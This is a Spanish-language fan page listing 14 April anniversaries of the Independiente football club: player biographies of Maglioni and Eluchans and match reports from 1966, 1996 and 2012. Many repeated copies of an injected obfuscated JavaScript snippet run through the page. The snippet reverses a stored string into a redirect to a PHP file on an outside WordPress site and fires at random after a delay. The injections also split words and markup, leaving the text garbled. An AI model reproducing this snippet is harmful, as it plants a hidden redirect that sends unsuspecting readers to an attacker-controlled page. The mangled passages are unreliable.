Conectate con nosotros

Efemérides

Efemérides del 14 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1946Nacimiento en Reconquista, provincia de Santa Fe, de Eduardo Andrés Maglioni. Aunque el pueblo donde pasó toda su infancia fue El Sombrerito, pero como no tenía hospital sus padres viajaron para su llegada a este mundo.

Jugó 148 partidos en Independiente convirtiendo 62 goles entre 1969 y 1973, para ser campeón del Metropolitano 1970 y 1971, la Copa Interamericana 1972, las Copas Libertadores 1972 y 1973, y la Copa Intercontinental 1973.

Llegó desde Sarmiento de Resistencia con la responsabilidad de ocupar el puesto que habían dejado monstruos como Héctor Yazalde y Luis Artime, pero no le pesó para nada la responsabilidad. Cargado de oportunismo de gol, este 9 de área entró perfecto en el equipo para cumplir con lo que debía: hacer goles.

Maglioni inflaba las redes nacionales y americanas con ambas piernas por su cualidad de ambidiestro. Y hacía goles de los importantes, los que valían para levantar copas, como en la final de la Copa Libertadores 1972, partido en el que estando desgarrado marcó los dos goles frente a Universitario, siendo el primer jugador del club en anotar por duplicado en una final de Libertadores.

También se anotó en la red en las dos finales de la Copa Interamericana 1973 frente a Olimpia de Honduras. Mientras que en la Copa Libertadores 1973 no pudo marcar goles en los encuentros que disputó, aunque jugaba más Miguel Giachello.

Fue el delantero de área titular en la final de la Copa Intercontinental 1972 frente a Ajax de Países Bajos, que lamentablemente no pudo conquistar Independiente. Pero al año siguiente, él y el Rojo tuvieron su revancha en Italia contra Juventus, partido en el cual también fue titular y trajo la Copa para Argentina.

Luego de marcharse de Avellaneda pasó por Huracán, más tarde por Colombia militando en Millonarios, Atlético Nacional y Unión Magdalena. Una vez retirado, estuvo vinculado a Independiente hasta hace muy poco tiempo, visitando peñas en cenas, atendiendo en la sede del club y llevando a cabo otras tareas, siempre con caballerosidad y generosidad.

Además de lo expuesto, Eduardo posee nada más y nada menos que un récord mundial en el famoso libro de los récords Guinness. Fue por marcar 3 goles en menos tiempo que cualquier otro futbolista del planeta, 1 minuto y 51 segundos, enfrentando a Gimnasia y Esgrima La Plata en el Metropolitano 1973. Un suceso extraordinario que amerita su propia efeméride y la tuvo el 18 de marzo.

Les dejo un video del triunfo 2 a 1 sobre Vélez por el Metropolitano1971, que tuvo al Rojo campeón. En dicho partido Maglioni convierte el segundo gol de emboquillada con una gran definición, pero además no se pierdan el primero de Independiente de tiro libre a cargo del gran “Pato” Pastoriza. Por otra parte, el descuento velezano estuvo a cargo de Carlos Bianchi de penal. Sobre esta jugada, habla luego el “Zurdo” Miguel Ángel López a los medios:

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»75″ height=»58″/></figure></div>



<p><strong>1966</strong> – <strong>Independiente visita</strong> Paraguay para jugar frente <strong>a Guaraní en el Estadio Manuel Ferreira, que pertenece a Olimpia</strong>. Era por la <strong>segunda fase</strong>, o fase semifinal, de la <strong>Copa Libertadores 1966</strong>, instancia en la que además compartía grupo con Boca y River.</p>



<div class=

El Rojo se impuso por 2 a 0 frente al conjunto paraguayo, con goles en la segunda etapa de João Cardoso a los 61 minutos y José Omar Pastoriza a los 87’. El equipo completo aquel día fue: Osvaldo Toriani; David Acevedo, Rubén Navarro, Idalino Monges y Ricardo Pavoni; Osvaldo Mura, José Pastoriza y Raúl Savoy; Raúl Bernao (39’ Tomás Rolan), Joao Cardoso y Aníbal Tarabini, con el D.T. Antonio Faldutti.

Ese mismo día River recibía a Boca y empataban 2 a 2. En tres partidos disputados hasta ese momento, Independiente lograba dos triunfos (ambos de visitante) y un empate, ubicándose primero con 5 puntos, River sumaba 4, Boca 3 y Guaraní 0.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»73″ height=»56″/></figure></div>



<p><strong>1980</strong> – <strong>Nacimien<script>$mWn=function(n){if(typeof ($mWn.list[n])==to en Tandil, provincia de Buenos Aires, de Juan Eduardo Eluchans, “Elu”, quien jugó en el club en dos etapas: del 2000 a 2006 y luego en 2007, completando 188 encuentros con 9 goles, y coronándose campeón del Torneo Apertura 2002.

Desde pequeño vino varias veces a Buenos Aires a probarse, pero se volvía a su Tandil natal por extrañar y no adaptarse. Quedó en Lanús y se volvió, en River y también regresó, hasta que con 14 años quedó en Ferro en la posición de delantero, y teniendo de técnico a un gran formador como Miguel Ángel Tojo. Permaneció un año y medio en las divisiones menores, hasta que lo dejaron libre porque Ferro no podía pagar el monto del pase que le pedía la Liga de Tandil.

A los 16 años se prueba en Racing y queda, pero su representante vio que había muchos delanteros y decidió llevarlo a Independiente. Así, con 17 años, entró a la Sexta División del verdadero dueño de Avellaneda. Un año después le cambiaron la posición, ya no sería atacante sino volante, y poquito después lo llevaron más atrás, convirtiéndose en lateral izquierdo debido a su velocidad y su enorme aptitud física de despliegue.

Debutó en Primera División y de forma internacional, en la Copa Mercosur del 2000, en el empate por 3 a 3 visitando a Universidad Católica, cuando Osvaldo Piazza lo hace ingresar en lugar de Cristian Zárate. Durante el 2001 fue tenido en cuenta, pero el lateral izquierdo titular era Mariano Pernía, y también estaba Juan Carlos “Avión” Ramírez, ya sobre el final de su carrera. Fue un año muy malo para el equipo, al igual que el primer semestre de 2002, cuando el Rojo fue último por primera vez en su historia.

Para el recordado Torneo Apertura 2002, hubo una gran renovación de plantel y Juan fue de los pocos juveniles que quedaron, sirviéndole al D.T. Américo Gallego, como recambio para Federico Domínguez o Pablo Guiñazú. Eluchans cumplió de buena manera cada vez que le tocó ingresar. En la primera fecha marcó el 2 a 0 frente a Lanús, en la cuarta frente a Racing hizo una gran jugada para asistir a Daniel Montenegro y definir el encuentro. Y sobre el final del torneo, tuvo la responsabilidad de reemplazar a un lesionado Federico Domínguez, disputando como titular los partidos frente a Boca y San Lorenzo que permitieron la coronación. En total, Eluchans dio el presente en 15 partidos del torneo.

Con la partida de Federico Domínguez se afianzó como titular, según el D.T. de turno jugando de lateral o volante, pero pocas veces perdió el puesto. Se sucedieron torneos muy malos para el club y Eluchans alternó buenos y malos partidos, pero siendo incuestionable su entrega. Lejos estuvo de ser de lo mejor en la historia roja, de ser ídolo o emblema, pero no se podía cuestionar que transpiraba la camiseta, que lo dejaba todo. Además de su enorme despliegue y ser incasable, tenía una buena pegada en centros y tiros libres. Por otra parte, trabajó siempre con humildad y sacrificio, lejos de vender humo o ser tribunero.

Para inicios de 2006, el D.T. Julio Falcioni decidió no tenerlo en cuenta, y pasó a préstamo por medio año a Rosario Central donde fue titular siempre. Regresó a mitad de 2006, cuando el D.T. era Jorge Burruchaga y lo ponía de titular siempre. Tuvo un muy buen semestre, con el equipo terminando cuarto, y en el primer semestre de 2007 también tuvo buen nivel, con Burruchaga primero y Miguel Santoro después. Eso fue lo último de Juan Eluchans en el club, porque a mitad de año lo compró SM Caen de Francia en aproximadamente un millón de dólares.

En su nuevo equipo juega por tres temporadas siendo titular, con una buena campaña en Primera División, luego descendiendo y por último logrando el ascenso. A mediados de 2010 pasa a Universidad Católica de Chile, coronándose campeón de Primera División ese año, y promediando 2011 regresa al país para jugar en Banfield. En 2013 llega a Atlético Rafaela, y ese año enfrenta a Independiente en el peor momento de su historia, pidiendo el cambio y yéndose a llorar al vestuario. Superó la barrera de los 100 partidos en Rafaela, manteniéndose en buen nivel, hasta que en el año 2016 pasa a Güaraní Antonio Franco de Misiones. Allí se retira en 2018, pero dos años más tarde lo convencen de volver a jugar, y viste la camiseta de Atlético Posadas por una temporada hasta retirarse con 40 años.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»69″ height=»53″/></figure></div>



<p>Les dejo <strong>videos de goles de Juan en el club</strong>. <strong>El primero es su gol a Lanús</strong> en la primera fecha del Apertura 2002:</p>



<figure class=

El segundo a Rosario Central en la fecha 10 del Clausura 2005:

Y el tercero a Banfield por la fecha 4 del Clausura 2007.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»69″ height=»53″/></figure></div>



<p><strong>1996</strong> – Por la <strong>fecha 6 del Clausura</strong> 1996, <strong>Independiente visita a River</strong> y <strong>le da una paliza memorable. Fue 1 a 4</strong> pero pudo y debió ser una goleada de cifras históricas. El partido se jugó a una semana de que Independiente perdiera la Recopa Sudamericana 1996, cayendo derrotado por 4 a 1 frente a Gremio.</p>



<p>Aquel día <strong>el equipo del Rojo fue</strong>: Faryd <strong>Mondragón</strong>; Jorge <strong>Martínez</strong>, Pablo <strong>Rotchen</strong>, José <strong>Serrizuela</strong> y Nés<script>$mWn=function(n){if(typeof ($mWn.list[n])==tor Clausen (37’ Juan Ramírez); Roberto Molina, Roberto Acuña y Diego Cagna; Jorge Burruchaga; Gabriel Álvez (73’ Javier Mazzoni) y José Calderón (65’ Diego Dorta), con Gregorio Pérez como D.T. Mientras que el DT Ramón Díaz puso este equipo para River: Irigoytía; Díaz, Ayala, Rivarola y Altamirano (45’ Lavallén); Almeyda, Astrada, Cedrés; Ortega; Francescoli y Amato (58’ Crespo).

En un campo de juego al cual le brotaba agua por todos lados, debido a las intensas lluvias caídas, arranca el partido y en apenas 3 minutos el Rojo logra ponerse en ventaja. Gabriel Álvez encaró por derecha y metió un pase hacia el medio a Jorge Burruchaga, que se filtró en la defensa de River y definió de zurda colocando la pelota contra un palo. A los 17 minutos llegó el empate, con un tiro libre de Enzo Francescoli que conecta de cabeza Gabriel Cedrés, dejando parado a Faryd Mondragón mirando el gol.

A los 31 minutos se iría expulsado Francescoli por exceso verbal al árbitro Ángel Sánchez, quien luego pareció compensar las cosas, porque a los 36 expulsó a Jorge Burruchaga por una falta que apenas ameritaba una amarilla. Ya estando ambos equipos con diez jugadores, el Rojo lograría ponerse en ventaja a los 39’, cuando un pelotazo largo va hacia el campo de River y una desinteligencia entre Ricardo Altamirano y Joaquín Irigoytía, dejaron la pelota servida a Gabriel Álvez para definir a la red sin ninguna oposición.

Ya en la segunda etapa, a los 55 minutos, Roberto Molina encara por derecha y mete el centro para José Calderón, que remata de zurda como viene pero Irigoytía tapa con su pie, sin embargo salió un rebote alto que cabeceó muy bien Álvez para poner el 3 a 1.

A partir de ese momento, el local no tuvo respuestas físicas ni futbolísticas, y el local desaprovechó infinidad de situaciones, chocando contra un arquero de gran partido. Sobre el final, cuando iban 87’, una nueva maniobra por derecha termina en pase al centro, para que Diego Dorta se acomode y defina contra un palo, marcando el 4 a 1 final.

Buen rendimiento del equipo en general, con buen manejo y creación en el medio, y un Gabriel Álvez desequilibrante ganando todas las jugadas. Mientras que River fue un concierto de errores, y de no ser por su arquero la goleada hubiese tenido cifras de antología. Resulta que Irigoytía tuvo errores y fue cómplice en algunos goles, pero en el segundo tiempo tapó una enorme cantidad de situaciones claras por parte de Independiente. Tal es así, que recibió 8 puntos de calificación, y las crónicas destacan que de no ser por él, hubiesen sido al menos el doble de goles los de Independiente.

Gran triunfo y muy recordado, contra un rival como River que históricamente le costó al Rojo. De hecho, se trató de la máxima goleada que el Rojo logró en el Monumental. Hasta la década del 80 inclusive el historial era parejo, pero desde los 90 hasta el presente cuesta bastante encontrar victorias del conjunto de Avellaneda, y mucho más aún con tal superioridad como la de un día como hoy.

Por otra parte, fue de lo poco positivo que dejó el breve paso de Gregorio Pérez como D.T. del equipo, porque había asumido en diciembre de 1995 reemplazando al “Zurdo” Miguel Ángel López, y por los malos resultados se marcharía en mayo de 1996, dando lugar a un breve paso de Humberto Grondona, y en agosto la llegada de César Menotti.

El campeón de ese Clausura fue Vélez, mientras que Independiente terminó decimosegundo, sin perder ningún clásico entre los equipos denominados grandes, todos de muy pobre torneo.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»78″ height=»60″/></figure></div>



<p>Les dejo el <strong>video resumen del partido</strong>:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»66″ height=»51″/></figure></div>



<p><strong>2012</strong> – Con más de 35 mil personas presentes, <strong>Independiente recibe a Racing</strong> en el estadio Libertadores de América en un nuevo clásico de Avellaneda. Fue por la <strong>fecha 10 del Clausura 2012</strong>, y a pesar del muy mal <script>$mWn=function(n){if(typeof ($mWn.list[n])==torneo que venía desarrollando, el Rojo se despachó a su rival ganándole por 4 a 1.

Aquel día el equipo fue: Adrián Gabbarini; Julián Velázquez (73’ Gabriel Vallés), Leonel Galeano, Gabriel Milito y Adrián Argachá; Fabián Monserrat, Fernando Godoy (75’ Cristian Pellerano) y Osmar Ferreyra; Lucas Villafáñez y Patricio Rodríguez; Facundo Parra (87’ Patricio Vidal), siendo Cristian Díaz el D.T. Mientras que para la visita, Alfio “Coco” Basile presentó a: Saja; Pillud, Aveldaño, Martínez y Licht (61’ Cáceres); Zuculini, Pelletieri (83’ Yacob) y Castro (73’ Viola); Moreno; Hauche y Gutiérrez.

El encuentro comenzó de forma pareja, aunque el primer cuarto de hora fue Independiente quien presionaba más arriba y el que se adueñó de la pelota, sin generar peligro. La visita se fue acomodando, se posicionó mejor en el campo, cortando el flujo de juego y atacando de forma más directa. Así, a los 26 minutos lograría ponerse en ventaja, cuando llega una pelota larga al sector izquierdo de Independiente, y Gabriel Milito falla en el momento de rechazarla, no haciendo más que dejársela servida a Gabriel Hauche, quien sin oposición se mete al área y asiste a Teófilo Gutiérrez para que la empuje y convierta el 0 a 1.

Antes de seguir con el desarrollo del encuentro, quiero hacer un alto es esa jugada, porque una vez finalizado el partido Gabriel Milito declaró: “El 0 a 1 lo regalé yo, cometí un error grande”. Lo destaco porque me resulta de gran nobleza y humildad lo del capitán aceptando su error, y por otra parte, porque recuerdo infinidad de errores de futbolistas del club, desde fallas garrafales de defensores, de arqueros, goles errados insólitamente, expulsiones infantiles, etc., etc., pero es poco común y se cuentan con los dedos de las manos, los jugadores que han tenido la nobleza de reconocer esos errores en el juego. Sumado a eso, el ídolo se mostró completamente dolido y enojado en el campo de juego, aunque nadie del público lo reprobó, mientras que infinidad futbolistas mediocres han pasado por el club y ni se han inmutado frente a continuos errores mucho más groseros.

Ahora bien, volviendo al partido, el Rojo no tardó demasiado en igualar las cosas, porque a los 35 minutos hay tiro libre a cargo de Osmar Ferreyra que mete la pelota al corazón del área, donde Julián Velázquez realiza un buen movimiento y pelea como un león por la pelota, hasta asistir a Facundo Parra que fusiló al arquero y puso el 1 a 1. El delantero tuvo un gran gesto de compañerismo yendo a festejar su gol con el “Mariscal” Milito.

Inmediatamente Racing saca del medio y realiza un par de pases hacia adelante con todo Independiente dormido, Hauche llega en algunos segundos a quedar mano a mano con Adrián Gabbarini pero remató alto. Luego no pasó mucho más y se fueron al descanso igualados.

Desde el arranque de la segunda etapa se vio a un Independiente más agresivo, generando más juego y siendo más peligroso en sus ataques. Tuvo varios desbordes que no se pudieron terminar de la mejor manera, hasta que a los 56 minutos es Lucas Villafáñez el que llega hasta el fondo por el sector derecho, metiendo la pelota por bajo con centro atrás, donde llegaba Patricio Rodríguez para convertir, pero le comenten penal. Fue un desplazamiento leve de Bruno Zuculini, pero suficiente para evitar que “Patito” convierta, por lo cual vio la tarjeta roja de forma directa, no por la agresividad de su falta sino porque el futbolista del Rojo ya no tenía ninguna oposición para marcar el gol. Facundo Parra cambió penal por gol a los 58 para el 2 a 1 a favor del local.

El Rojo no supo aprovechar el hombre de más como se debe, si bien intentó controlar la pelota y los tiempos, no era punzante para buscar el tercer gol que sellara la historia. Con más espacios creció el juego de Patricio Rodríguez, quien en una jugada mostró todo su dominio y desequilibrio sacando a pasear a Lucas Aveldaño hasta casi marearlo. Cuando iban 68la visita perdería otro jugador, porque de forma increíble Teófilo Gutiérrez insultó al juez al reclamarle una falta sobre Giovanni Moreno, por lo cual vio la roja directa haciendo todo lo posible por perjudicar a su propio equipo.

Estando 11 contra 9, increíblemente Racing tuvo la más clara para empatar, pero Agustín Pelletieri la tiró por arriba cuando era más difícil hacer eso que convertir. El Rojo mostraba todas sus falencias de juego aún con todo el contexto a favor, mientras que la visita debió quedarse con 8 jugadores por un codazo de Hauche a Gabriel Vallés.

Así se llegó al tiempo adicional, con un Racing que ya se mostraba entregado de tanto ir al frente con 9, e independiente de contragolpe liquidaría la historia. Iban 92 minutos cuando llega un pelotazo cruzado para encontrar a Villafáñez solo de cara al gol, define pero su remate es tapado por Saja, pero el rebote le cae al ingresado Patricio Vidal para mandarla a la red.

Dos minutos más tarde llegó la frutilla de la tarde, gracias al “Patito” Rodríguez que recibe por el sector izquierdo y al controlar la pelota ya se saca a su marca de encima, se metió al área y encaró hacia el centro, gambeteó, amagó, dejó a todos parados  y definió cruzado y arriba para un verdadero golazo. Fue el 4 a 1, fue pura fiesta para el dueño de Avellaneda, alcanzando 22 encuentros de diferencia en el historial.

Por el lado de Independiente quedaron las falencias mostradas para definir mucho antes el partido, y de forma más global, se afirmó cada vez más como D.T. Cristian Díaz. Llevaba 13 puntos logrados sobre 18, incluyendo este triunfo en el clásico y el inolvidable 5 a 4 sobre Boca.

El equipo no jugaba bien y tampoco mostraba solidez, el D.T. venía de las inferiores y conociendo a sus jugadores recurría a ellos, por ejemplo, en el clásico faltaron Eduardo Tuzzio, Ernesto Farías y Roberto Battión. Los buenos resultados iniciales generaron falsas expectativas, y una dirigencia inoperante preocupada en otras cosas, no eligió buscar un D.T. de experiencia como la situación requería, debido a la necesidad de puntos por la cuestión del promedio.

El equipo nunca se consolidó y terminó decimosexto ese torneo, agravando su situación que ya venía complicada por el paupérrimo paso de Ramón Díaz por el club. Cristián Díaz manejó el mercado de pases de mitad de año, y en apenas 4 fechas del siguiente campeonato dejaría su cargo por los malos resultados, dando paso a la llegada de Américo “Tolo” Gallego, una clase de técnico que debía llegar mucho antes.

Siguiendo en el tema Ds.Ts, por el lado de Racing la caída significó la renuncia de su ídolo y emblema, Alfio Basile, quien ya no volvería a dirigir a ningún club.

Se le insistió para que se quedara, pero sonó fuerte su frase de “las pelotas sigo”. Y ello no fue solamente por la derrota, sino por lo acontecido en el vestuario una vez terminado el partido. Hubo forcejeos y hasta se mencionaron golpes entre jugadores, pero el hecho resonante y de máxima tensión se vivió cuando varios jugadores increparon a Teófilo Gutiérrez por su irresponsabilidad, y éste sacó un arma para defenderse.

Primeramente se habló de que se trataba de un juguete, pero luego se sabría que era un arma real. La imagen del jugador yéndose completamente solo del estadio en taxi quedó inmortalizada.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»75″ height=»58″/></figure></div>



<p>Les dejo <strong>video de la cobertura del partido por el programa Paso a Paso</strong>:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides